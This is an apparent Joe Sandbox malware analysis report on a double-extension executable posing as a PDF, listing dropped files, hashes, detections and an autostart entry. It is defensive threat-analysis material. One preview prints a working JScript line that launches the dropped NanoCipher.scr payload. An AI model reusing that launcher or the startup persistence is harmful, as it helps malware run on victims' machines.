Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1546130 Sample: scan_doc_zapit_836893.pdf.exe Startdate: 31/10/2024 Architecture: WINDOWS Score: 92 44 EPjDBRbjWjdkBwcRYTSjrZwkKu.EPjDBRbjWjdkBwcRYTSjrZwkKu 2->44 48 Sigma detected: Suspicious Double Extension File Execution 2->48 50 Sigma detected: Search for Antivirus process 2->50 52 Sigma detected: Drops script at startup location 2->52 54 4 other signatures 2->54 10 scan_doc_zapit_836893.pdf.exe 19 2->10         started        12 wscript.exe 1 2->12         started        signatures3 process4 signatures5 15 cmd.exe 3 10->15         started        60 Windows Scripting host queries suspicious COM object (likely to drop second stage) 12->60 19 NanoCipher.scr 12->19         started        process6 file7 40 C:\Users\user\AppData\Local\Temp\...\Spy.pif, PE32 15->40 dropped 46 Drops PE files with a suspicious file extension 15->46 21 Spy.pif 4 15->21         started        25 cmd.exe 2 15->25         started        27 conhost.exe 15->27         started        29 7 other processes 15->29 signatures8 process9 file10 36 C:\Users\user\AppData\...36anoCipher.scr, PE32 21->36 dropped 38 C:\Users\user\AppData\Local\...38anoCipher.js, ASCII 21->38 dropped 56 Drops PE files with a suspicious file extension 21->56 58 Deletes itself after installation 21->58 31 cmd.exe 2 21->31         started        signatures11 process12 file13 42 C:\Users\user\AppData\...42anoCipher.url, MS 31->42 dropped 34 conhost.exe 31->34         started        process14

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
scan_doc_zapit_836893.pdf.exe8%ReversingLabs
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr5%ReversingLabs
C:\Users\user\AppData\Local\Temp\185027\Spy.pif5%ReversingLabs
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
NameIPActiveMaliciousAntivirus DetectionReputation
EPjDBRbjWjdkBwcRYTSjrZwkKu.EPjDBRbjWjdkBwcRYTSjrZwkKu
unknown
unknownfalse
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://www.autoitscript.com/autoit3/Jscan_doc_zapit_836893.pdf.exe, 00000000.00000003.2103831695.000000000291B000.00000004.00000020.00020000.00000000.sdmp, Spy.pif, 0000000B.00000003.2151374293.000000000404C000.00000004.00000800.00020000.00000000.sdmp, Spy.pif, 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmp, NanoCipher.scr, 00000011.00000000.2289726663.00000000007C9000.00000002.00000001.01000000.00000008.sdmp, Spy.pif.2.dr, Tim.0.dr, NanoCipher.scr.11.drfalse
      unknown
      http://nsis.sf.net/NSIS_ErrorErrorscan_doc_zapit_836893.pdf.exefalse
      • URL Reputation: safe
      unknown
      https://www.autoitscript.com/autoit3/scan_doc_zapit_836893.pdf.exe, 00000000.00000003.2103831695.000000000291B000.00000004.00000020.00020000.00000000.sdmp, Spy.pif, 0000000B.00000003.2151374293.000000000404C000.00000004.00000800.00020000.00000000.sdmp, Spy.pif, 0000000B.00000002.3351472236.00000000016F4000.00000004.00000020.00020000.00000000.sdmp, Spy.pif.2.dr, Tim.0.dr, NanoCipher.scr.11.drfalse
        unknown
        No contacted IP infos
        Joe Sandbox version:41.0.0 Charoite
        Analysis ID:1546130
        Start date and time:2024-10-31 14:36:47 +01:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 7m 20s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of analysed new started processes analysed:21
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:scan_doc_zapit_836893.pdf.exe
        Detection:MAL
        Classification:mal92.expl.evad.winEXE@28/17@2/0
        EGA Information:
        • Successful, ratio: 100%
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 102
        • Number of non-executed functions: 297
        Cookbook Comments:
        • Found application associated with file extension: .exe
        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
        • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
        • Not all processes where analyzed, report is missing behavior information
        • Report creation exceeded maximum time and may have missing disassembly code information.
        • Report size exceeded maximum capacity and may have missing behavior information.
        • Report size exceeded maximum capacity and may have missing disassembly code.
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        • Report size getting too big, too many NtSetInformationFile calls found.
        • VT rate limit hit for: scan_doc_zapit_836893.pdf.exe
        TimeTypeDescription
        09:37:42API Interceptor3494x Sleep call for process: Spy.pif modified
        09:38:00API Interceptor2435x Sleep call for process: NanoCipher.scr modified
        14:37:46AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NanoCipher.url
        No context
        No context
        No context
        No context
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        C:\Users\user\AppData\Local\Temp\185027\Spy.pif#U0417#U0430#U043f#U0438#U0442 #U0421#U0411#U0423.rarGet hashmaliciousUnknownBrowse
          .gov.ua.htmlGet hashmaliciousUnknownBrowse
            chrome.exeGet hashmaliciousUnknownBrowse
              chrome.exeGet hashmaliciousUnknownBrowse
                Set-up.exeGet hashmaliciousLummaC StealerBrowse
                  Set-up.exeGet hashmaliciousLummaC StealerBrowse
                    burlar al diablo napoleon hill pdf.exeGet hashmaliciousUnknownBrowse
                      burlar al diablo napoleon hill pdf.exeGet hashmaliciousUnknownBrowse
                        DA92phBHUS.exeGet hashmaliciousXWormBrowse
                          Okfjk1hs4kdhs2.exeGet hashmaliciousLummaCBrowse
                            C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr#U0417#U0430#U043f#U0438#U0442 #U0421#U0411#U0423.rarGet hashmaliciousUnknownBrowse
                              .gov.ua.htmlGet hashmaliciousUnknownBrowse
                                chrome.exeGet hashmaliciousUnknownBrowse
                                  chrome.exeGet hashmaliciousUnknownBrowse
                                    Set-up.exeGet hashmaliciousLummaC StealerBrowse
                                      Set-up.exeGet hashmaliciousLummaC StealerBrowse
                                        burlar al diablo napoleon hill pdf.exeGet hashmaliciousUnknownBrowse
                                          burlar al diablo napoleon hill pdf.exeGet hashmaliciousUnknownBrowse
                                            DA92phBHUS.exeGet hashmaliciousXWormBrowse
                                              Okfjk1hs4kdhs2.exeGet hashmaliciousLummaCBrowse
                                                Process:C:\Users\user\AppData\Local\Temp\185027\Spy.pif
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):189
                                                Entropy (8bit):4.610292045525758
                                                Encrypted:false
                                                SSDEEP:3:RiMIpGXIdPHo55wWAX+eLCMuL4EkD5rijAeGVLbBrZo5uWAX+eLCMuL4EkD5rijH:RiJBJHonwWDeLPqJkD1ijRobtywWDeL2
                                                MD5:AE3F79E8F2D0228D4D9E761ACA281849
                                                SHA1:5B8384DE9F51EC42CD09DD27F921294F530410A5
                                                SHA-256:A50BE7A6DA084F41FE629ECD7DC8B4C61A094C8E6876BA3FCF4A52FC58971BD3
                                                SHA-512:1A0E0227B0D60FBA61DBBF53365F5EE4BF35DC44F8A8BF883292EA0F50DEF26195B090E98A39DE0C352879ECF8398D54DC6F85822DB94B3F7C707025D7765666
                                                Malicious:true
                                                Preview:new ActiveXObject("Wscript.Shell").Exec("\"C:\\Users\\user\\AppData\\Local\\NanoSec Cryptographics\\NanoCipher.scr\" \"C:\\Users\\user\\AppData\\Local\\NanoSec Cryptographics\\o\"")
                                                Process:C:\Users\user\AppData\Local\Temp\185027\Spy.pif
                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):893608
                                                Entropy (8bit):6.62028134425878
                                                Encrypted:false
                                                SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 5%
                                                Joe Sandbox View:
                                                • Filename: #U0417#U0430#U043f#U0438#U0442 #U0421#U0411#U0423.rar, Detection: malicious, Browse
                                                • Filename: .gov.ua.html, Detection: malicious, Browse
                                                • Filename: chrome.exe, Detection: malicious, Browse
                                                • Filename: chrome.exe, Detection: malicious, Browse
                                                • Filename: Set-up.exe, Detection: malicious, Browse
                                                • Filename: Set-up.exe, Detection: malicious, Browse
                                                • Filename: burlar al diablo napoleon hill pdf.exe, Detection: malicious, Browse
                                                • Filename: burlar al diablo napoleon hill pdf.exe, Detection: malicious, Browse
                                                • Filename: DA92phBHUS.exe, Detection: malicious, Browse
                                                • Filename: Okfjk1hs4kdhs2.exe, Detection: malicious, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                                Process:C:\Users\user\AppData\Local\Temp\185027\Spy.pif
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):518748
                                                Entropy (8bit):7.999632035339632
                                                Encrypted:true
                                                SSDEEP:12288:HMbDqAxkqP/1vU6VQ12JQSUOsROHXp9YF:6DqvitU6qZObg
                                                MD5:CF5248A05D5201CB596BE18810555996
                                                SHA1:537010947EAB7BA675A99326BD9C3AF5D5CB1301
                                                SHA-256:D73BCC672158084ED5D6352648C58398AEBF5C7840ED7202C4991F8AA59EFFD7
                                                SHA-512:49AB322819C8D150B7C4AB4A6CD0DDCAC274E04545208E426C645E27C3742C407869B9B3185990E71BC85398F7B4B4D140F192005291CD59FA85254E86E87BEA
                                                Malicious:false
                                                Preview:.. ...C.87.j..{_..r.t...;.g...0.,q.~!..mVl..8.N{.}..{..J_q.9.1I..=.\.>.........+.,Cq.-...4...4.:..}...~g...Wjo. n..u..U.|....1,w..&....."..W0..ML.Q.o,........+.h....UcQ..;.$...........). L_.e....:U.B.pa..E...S3P...o. .:..o.:..$..G2..(0*;;...+aW...HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....Rp...D.;.'.F...h.............p+....(.p+....(.kC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..*)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...`.[..r....R..,P..Myn.2..t.W.....`...;.....|p+......p+....(.m.........5...x..2).U.j....>..#.~......!.`|...l..)u-T..<,.......%=.'....|'.4....=._..G..._....[..}...X..I..b.x<......kxy(SRd.'N.e.S.fO%&9..{.$..\..;.6n..+q......K...<.....G...#t...WZB.mQ...?$...Hg.3b.0y.W..5...=q.Y.K...V...hI@.`Z@.$..2L
                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):518748
                                                Entropy (8bit):7.999632035339632
                                                Encrypted:true
                                                SSDEEP:12288:HMbDqAxkqP/1vU6VQ12JQSUOsROHXp9YF:6DqvitU6qZObg
                                                MD5:CF5248A05D5201CB596BE18810555996
                                                SHA1:537010947EAB7BA675A99326BD9C3AF5D5CB1301
                                                SHA-256:D73BCC672158084ED5D6352648C58398AEBF5C7840ED7202C4991F8AA59EFFD7
                                                SHA-512:49AB322819C8D150B7C4AB4A6CD0DDCAC274E04545208E426C645E27C3742C407869B9B3185990E71BC85398F7B4B4D140F192005291CD59FA85254E86E87BEA
                                                Malicious:false
                                                Preview:.. ...C.87.j..{_..r.t...;.g...0.,q.~!..mVl..8.N{.}..{..J_q.9.1I..=.\.>.........+.,Cq.-...4...4.:..}...~g...Wjo. n..u..U.|....1,w..&....."..W0..ML.Q.o,........+.h....UcQ..;.$...........). L_.e....:U.B.pa..E...S3P...o. .:..o.:..$..G2..(0*;;...+aW...HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....Rp...D.;.'.F...h.............p+....(.p+....(.kC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..*)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...`.[..r....R..,P..Myn.2..t.W.....`...;.....|p+......p+....(.m.........5...x..2).U.j....>..#.~......!.`|...l..)u-T..<,.......%=.'....|'.4....=._..G..._....[..}...X..I..b.x<......kxy(SRd.'N.e.S.fO%&9..{.$..\..;.6n..+q......K...<.....G...#t...WZB.mQ...?$...Hg.3b.0y.W..5...=q.Y.K...V...hI@.`Z@.$..2L
                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Category:modified
                                                Size (bytes):893608
                                                Entropy (8bit):6.62028134425878
                                                Encrypted:false
                                                SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 5%
                                                Joe Sandbox View:
                                                • Filename: #U0417#U0430#U043f#U0438#U0442 #U0421#U0411#U0423.rar, Detection: malicious, Browse
                                                • Filename: .gov.ua.html, Detection: malicious, Browse
                                                • Filename: chrome.exe, Detection: malicious, Browse
                                                • Filename: chrome.exe, Detection: malicious, Browse
                                                • Filename: Set-up.exe, Detection: malicious, Browse
                                                • Filename: Set-up.exe, Detection: malicious, Browse
                                                • Filename: burlar al diablo napoleon hill pdf.exe, Detection: malicious, Browse
                                                • Filename: burlar al diablo napoleon hill pdf.exe, Detection: malicious, Browse
                                                • Filename: DA92phBHUS.exe, Detection: malicious, Browse
                                                • Filename: Okfjk1hs4kdhs2.exe, Detection: malicious, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                                Process:C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):98304
                                                Entropy (8bit):7.997836829981676
                                                Encrypted:true
                                                SSDEEP:1536:5JoaF1pQ+Bivk9GmvKJ64UW7K/VlmKIW09zqkSQtem4SxgZ/DDZSD09XBM8zIDw6:5JrUv764UW7K/bLMzqBQteExSDDZl1B4
                                                MD5:FA1CC3AB4F5055541732DDD8D875C135
                                                SHA1:8872AE2A2F63DAB182ABA07342CC8190E6EC1DDE
                                                SHA-256:FD897C1E947BD3BADAB64F72349C08BFB6CD5787A3EB627578334315B1268395
                                                SHA-512:4D3482B63F143B64E6A134FA86A880FBA32FF04738E574C93FAB6A13E290BB5BEA5FD227CB0DA820660F5868EEC804697682B77F8FFFA8E3DC138BDD77D6E993
                                                Malicious:false
                                                Preview:..w@...=..,..`-..5.....J.Pc.p<whJ..,5...&.,..~%..`{.U.>./..EN......v.\..FS....[?d..P m\.A..~.....+K.d.%..Fj. *......t&tawt>n.a.D.>p9.3...G.}...UQ..B....l..+..j~].AE.$..o.......e.;....MN-$!.3...._,e...GI.$....V.m9l.nim.c......]*...yX..^..p...u}..y.Z.7..1~`...2...].n..h4..1....|..............H:Kuq.6.X.DN......s8<...S..5.g.^.).:.<1..k1.[.N>.(B....uF...nk...}....r.a.2...E.T....w.....i.z.{.Z........L...c..J.B..H...:.@..vws0..<.<R..<....e..9.IO....xJ..)...o...*}nq.0.".b.e.....M..I.q.1.$Bt.r.l.>R`.....M.....ec+.&...F..~7/.8d(..8..-.^.)5..@........Ro.....{0.....{dn.....Q....z.I....~%....v...N.Mt..}..jV..Y.../9/.g......".0.....o..G.W....R.G...,...z.>.....$. ..a....K..q.W...../Q...P7.......5\.....]....An.....=.]3"V..6..<&....x...q..k.BX..>O......B.&T}.$n.........)..-Y...O...$k.......C...D..G.x...n.I..(.c......Z.k9..]..v.....%..Z'w.d...0..N....&.{3#.q/.n.....Q5........... hbpd.....L|.>......@.....:.............;....(.9D..!d.#..DBMr.0.:.
                                                Process:C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):74752
                                                Entropy (8bit):7.997750754709227
                                                Encrypted:true
                                                SSDEEP:1536:6ae1qXHsdtvUadRpxHzOAkg4lIiSIV6+lAhD7gBK6Rww6SxWR:c18M/vUadtHzzkgqIZIVVlACVZYR
                                                MD5:89E81DAB8000A2B73D9643E42A72DE15
                                                SHA1:6FAB41A9E7C5680070876B4CAB61C04F968C6572
                                                SHA-256:04E60272D87FEF156A62052EAE1C622C572DA81C26CD884BFE55E27C1C984A56
                                                SHA-512:F1B7274A630252DC34AF18FD01061EE2E32DFBAA86CDE6581ECF218474408C34FFA321B4A0037FEDFEA6909DAECE91B0429C4FBA89B8C48C6DF75AD58EF87B1E
                                                Malicious:false
                                                Preview:.U.\..k....G.].Z....0L.';.......>..a.R%....`Wz..R..R.aq..o .}aq.O_HK.s..%.in.......g.D.....3g..?.....!.rd......g....1-.B.DC........6....5.4z.0..J.S...e..W\.i;D$s......?^...}.C..R..X..Ip.!Cf.c?....9..`(.U.......qV.....7....u....-D'-.[.._.+..d/.2..m.5........9.f...\.?.........*#...aN..q......../bg.H.jK3:........._qK.F+*.P...y.T.%..I../..*.p.6UC.FE_:.>.M...7.........X...K.oJ..&..q........._.d...%_.u..h..g..].......2]..i?..s.y.b.*DU...`.K..jZd!...XO7ua...,&. ..Q.u.....AP..`I.@.Ik.)h...@.c.1D.\.v..W.....}..>.....$............Cz..aw.. .%.?.q-.U.i*....K..N?xs..4m..2...+.+.\..#..+k.t..?P. ..QF...;..cG._..v.1puu'.o.L. .u&.rA..%.....<f)o.+m.Y.....=5.."..D.M.z$......!.|........Wi...~9C.....J...q.I...^. {.\P...3x5...r.e.....W&l.Ez.A(.luM.R..@.!...s..z~...|w.}.B..'.O?......._<.}u2`.KBB.Sg.`@..=".m.$......! .x.+..A?{.b?.t.........h{.Z.`.%L.0.2.@..z.O..q&[.JiT#.'.t'.....>...b....3k8.XU._.W......?*..t"hiP....t[........Ek..JI.[.\(,..2...r..%H.........x...@...
                                                Process:C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):87040
                                                Entropy (8bit):7.99786503957624
                                                Encrypted:true
                                                SSDEEP:1536:1RUQJN00D3PnZGyrJ0bNkvTuSUkhiq+apEd4fEYjiYrnqZPZ:1RUyh/gyrYNkvKSU+izYjiYbMZ
                                                MD5:451B264363660B3725CDFBC883227E38
                                                SHA1:6B695024901A21F973E82734434212E3C9C74133
                                                SHA-256:1FB0C5DB72F245600829D31A4987AED15A179F1157BAFB3C3AF86B56C36C5E73
                                                SHA-512:C15550CFF8DC14266C55FE94A66B9C6F16182669E0B606637A2267BF503C6CB270DE1BC806FD167480EE7691211F0ECB872ACA30C952A203C8421DE21AA1B5A4
                                                Malicious:false
                                                Preview:."..B.Y....z>.Y.........W'.O>K.i..#.M.1|f^".D.]#.f@..ck.....S..n.Z~...'........U.N' ~.... M..e..m)...U].............=.6..~<K...fT.(....}r21..... @L5..q.x...*`V..C..<.E.M.%.K..........y.4..:..$.6..;!....k'2.o...+....7#..E.6.W.......3.....4".l..I.W.Q..ag..Vd<..R.9......Ad.&%.b....w...C...n?....._.H.4s..P...QAQLg1JB.`1....Pr...V..ZA.,...........I.....^eQ.{...2$UE..g..}......t/?.z.....A...w.|x..$%........7.....q.7... {D%r.i...A...qz........z...]hC....|.......3.w.m..".hw......L:<V...h........bs.Tr.6.\...}..].*............}..e...F.l...Y.f.2+.%.ka.Q.e.:../[.,8MA.!.F.{..`..K..e.Q.V...A....3.X-..m;...]..;.u..h{.T.]eI.E.....v~...S~...~f.?.+]i._...D..=.....?.X..#..;W.m..s..p..UQO.Apwe.h.P?Eu.>...*e.3J.....&...^.....b.8......~..N6.1.<...T.......FZ=..b6...%2....4a. ..?......a.w.....+_Xkn.xE(.'D......xI..=.......\...|......"....3^..!.....VY.._/.w...X...(Q...t.,.%.Dh.];....hi...)\.......P.~L..oP..4.......94,4u...%{.rs.b.J...D.P..$..I...R......0.!j.>t.k.....
                                                Process:C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):42588
                                                Entropy (8bit):7.995385083436723
                                                Encrypted:true
                                                SSDEEP:768:aDBqSTSvISK1F8XUHyEUNGufmOiXoe9sjoJ44wppjdnS7jiSI5:aMSO1K1F8XUHrQ2Oi4e9sjoJ44wX1S7u
                                                MD5:95DE9DB271D3B485FF1C553FA44CD0A1
                                                SHA1:E02F7F27DD2F22107CA1B61E7829F07DD76879B6
                                                SHA-256:D2735070FDD4EAEED64282C742486DC33A4F6A757D940C2073B2A96C0D19B985
                                                SHA-512:967DDA38A5333E6004FB85FC337E76BE5C4F4EAFFE865EDC9558F361279437A5A0289C086E03EC0E48DFF4FCEF42DAFB0097BAB15F34590CD3F8EA4645531724
                                                Malicious:false
                                                Preview:.....&.<..b..`...Z.32...3.h.......... .v.t...b...#c.Jn^)....`.b...=~u/.|..R......../e..l.p...yE...2.,d$.e.{YL.p.;...r.....\........"....&....-lv.sV.-&...n._...6.HlU.,..../f)m..(6....B@.k*[.*+.....~fg.7Sh%...Xc..J/K......Y...k..qP..s.<.........o>..6..Lmr.w\.P...z ......[2....G.A5..8...E.+..'@n|.=.J.s....I..l.L.s..FH...'3mY..J....?O...R4t./.../...."..)......{.v....`........|.....>..A...d."L.f..k.e...:.....T#.;m.+....IL.m;0...%!m....hE..=K.iJ..c...@.)}....4o..M$Y......:...k&.C.T;f..K.wt..).)...-..n.n.LGl....B..!...4..:...+s....(...f).rg1..V2.A%.N.j,....3...U-4.0.0...C..m=..&_.....6V.j.].#.t.z.|.d.. b...K3h.c.../{...F...I{*....F..!/....l....g;..T._l.%.v..z..'f.d....S.&...c.!!...9.P.../..U....q<h.*B..P..p...a..=E....|...h.<'.w..q....k....!.o.0........YD.Ox-.d...~@6@1z..;k.x}y'...f....:X,.T.....+.cl..=.Y.&.d1..........R=.....9.h-Z..&.(Z'...~...'^.(D.h<..S. ..c.3...].......2.W..C^n....?.hW...r...m...o..P..?..j.3.....L....Pt#.j.hOQL.{.._T.O..q?.X....
                                                Process:C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):79872
                                                Entropy (8bit):7.997900445840888
                                                Encrypted:true
                                                SSDEEP:1536:OlQYrjuik6PRICjj77oe/J5jdnuoT3r9UWB3q6HE8By/+IiiduqU:EQYrb3oe/JpdnuorDq6kC7UI
                                                MD5:9E14B62B60B6D8DEFF595665714D21FB
                                                SHA1:FD2B5F9D546FB1181B2C3CF4F8E586AC60E469AA
                                                SHA-256:8DC24185E6F9691BD40730CBC52A0F28E3ECB338652AE6B172D52215FE84E4E2
                                                SHA-512:DF80B444B34E000A6CF76277A079ADA7D968E32FDD0728BF04810BFF78D709891CC2EDCD1446A24989593C246DFD34687F7B7481D132100CE4E19523FFA6A426
                                                Malicious:false
                                                Preview:.. ...C.87.j..{_..r.t...;.g...0.,q.~!..mVl..8.N{.}..{..J_q.9.1I..=.\.>.........+.,Cq.-...4...4.:..}...~g...Wjo. n..u..U.|....1,w..&....."..W0..ML.Q.o,........+.h....UcQ..;.$...........). L_.e....:U.B.pa..E...S3P...o. .:..o.:..$..G2..(0*;;...+aW...HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....Rp...D.;.'.F...h.............p+....(.p+....(.kC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..*)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...`.[..r....R..,P..Myn.2..t.W.....`...;.....|p+......p+....(.m.........5...x..2).U.j....>..#.~......!.`|...l..)u-T..<,.......%=.'....|'.4....=._..G..._....[..}...X..I..b.x<......kxy(SRd.'N.e.S.fO%&9..{.$..\..;.6n..+q......K...<.....G...#t...WZB.mQ...?$...Hg.3b.0y.W..5...=q.Y.K...V...hI@.`Z@.$..2L
                                                Process:C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):84992
                                                Entropy (8bit):7.997991765034814
                                                Encrypted:true
                                                SSDEEP:1536:7q+XAmE5ETG+pdTdrBEwvoJkAljZgu2rhFLPPkK38GMG:7q+XrNC47rBEZrljZgu2rDcqz
                                                MD5:F79ED8CD25A0C0DF29B1E687D414B83F
                                                SHA1:5704CEA46FE8C6FFEFEC21DF2338D3405EC1F542
                                                SHA-256:9CA00221B738AF74CA71D637F22439B91D12E4C283E6F6CB7E58954EF83466F5
                                                SHA-512:CB5A9FF18E9EFC1F38216BD12CAC81787D354339558266435C42994F68A0DB06F64089B634B18257B2279A45613EAFF962BF16CA81EB3910E27762BCC1CA8365
                                                Malicious:false
                                                Preview:..0Q'.z.U....=......|........W....M......}.w......=Sl...R._cDX...w.C1.L...).^Thm..rL..@"..Ek*...=mHr.......Ifit1.2...$;....!.."%..1.i....7.../.#g 9z.s..e,..6.....T..#.O....G......!..Fo..t@._.>.`H:.;........O....w,.........?...$..G..i.._g...#..j.E}.......H..Q.....B.cK.B........k....Oi...&...5..n... ....&...V.mY..>.*.\......`.'\.....rD...2.Mnq.Oz.v...c..L...W/...Ay.F..V.QOZ.,.s..Q..$....a.RH!T....5u..B...B..CW..+mR..z?.....\....8.k@......3..'..G..|`....L........tu.9..(I.T^...K...y4.C.Z.9O.....-...'o!..... 7J.S."!..H..Kb...X.<.....;Yx3..vP.Cz.l...._.'>?.o..}GV..]........U....S>(....V.p.u....S...3&z..=CR.m*..&....#b.!.E....~.......X.b.._.C.....t.=^S.U.+.$.}m..e.M.B+."....!..92.z.k..1.N=]..}cC2..Q.e.w.LF..pb....dg.M......'.....mN..|.!E..2.].!r..QY]X(.~.2..F>"...Eh.sA.R.]..}.-.^.]..OQ.Zd.....\.....".b.|A...F..T&...O...(..y,5.7.x..Z.<..}A....^.....$..~ls.|...S.DK.\.g\..b...g.p......a...,.T...r......\...\.;.o.Z#.,./...i....g.....
                                                Process:C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):51200
                                                Entropy (8bit):7.996708631018947
                                                Encrypted:true
                                                SSDEEP:768:z6eiW6Vn25bULXUQExnfWj/WgeXe+ATKvStQbunv4rCiGmRYBvze:LiWa25ILXUQGo/heXeDuKtr4rgBS
                                                MD5:BDAD8A1F1980AC434AF0C3D0B92F8743
                                                SHA1:63B20AD7AADE68D1F0BF51085044FBF91A209323
